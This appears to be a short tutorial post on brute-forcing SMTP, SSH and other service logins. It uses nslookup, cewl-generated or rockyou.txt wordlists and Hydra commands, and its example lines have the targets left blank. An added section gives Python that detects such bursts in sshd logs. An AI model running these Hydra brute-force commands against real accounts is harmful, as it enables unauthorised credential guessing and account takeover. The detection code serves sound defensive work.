Planet Red


To brute-force SMTP, FTP, SSH, MySQL or other services, you can use Hydra, a simple tool included in Kali Linux.

Locate the email address / username and the email server.

Command: nslookup <DOMAIN>

Example: nslookup

Generate a wordlist using cewl or use rockyou.txt

CEWL Method

Command: cewl --write customwordlist.txt --depth 5 --min_word_length 8 https://<domain> --verbose

Example: cewl --write customwordlist.txt --depth 5 --min_word_length 8 --verbose

Brute force attack on server using email address and wordlist for password

Command: hydra -l <USERNAME> -P <WORDLIST> <SERVICE>://<SERVER>

Example: hydra -l -P rockyou.txt smtp://

For a faster, more targeted brute force, use the cewl method to create a wordlist by crawling the site for keywords. You can then use the custom wordlist with hydra. Alternatively, you can use rockyou.txt, a default wordlist included with Kali Linux, with more than 14 million possible password combinations.
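
On the server side, a run like `hydra -l <USERNAME> -P <WORDLIST> ...` appears in the logs as a burst of failed logins for one account from one source. The following is an added example, not part of the original post, that flags that pattern in sshd auth-log lines; the sample log lines, the threshold, the window and the year are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# sshd failure line in classic syslog format, with or without "invalid user".
FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60), year=2024):
    """Return {(ip, user): peak failures inside one window} for pairs that
    reach `threshold` failed logins within `window`."""
    recent = defaultdict(deque)   # (ip, user) -> timestamps still inside the window
    alerts = {}
    for line in lines:
        m = FAILED.match(line)
        if not m:
            continue              # accepted logins and unrelated lines are ignored
        # Syslog timestamps carry no year; one is supplied (assumption).
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["ip"], m["user"])
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        if len(q) >= threshold:
            alerts[key] = max(alerts.get(key, 0), len(q))
    return alerts

# Constructed sample log: addresses come from documentation ranges.
SAMPLE = (
    # Eight failures for one account, two seconds apart: the wordlist pattern.
    [f"Mar 10 09:15:{2 * i:02d} mail sshd[2101]: Failed password for alice "
     f"from 203.0.113.7 port {40000 + i} ssh2" for i in range(8)]
    + [  # Two widely spaced failures and one success: should not alert.
        "Mar 10 09:20:00 mail sshd[2150]: Failed password for invalid user bob "
        "from 198.51.100.9 port 51000 ssh2",
        "Mar 10 09:31:00 mail sshd[2188]: Failed password for invalid user bob "
        "from 198.51.100.9 port 51010 ssh2",
        "Mar 10 09:32:10 mail sshd[2190]: Accepted password for carol "
        "from 192.0.2.44 port 52000 ssh2",
    ]
)

if __name__ == "__main__":
    for (ip, user), peak in detect_bruteforce(SAMPLE).items():
        print(f"ALERT {ip} -> {user}: {peak} failed logins within 60s")
```

The same counts can drive an account lockout or a source-address rate limit on the mail or SSH service.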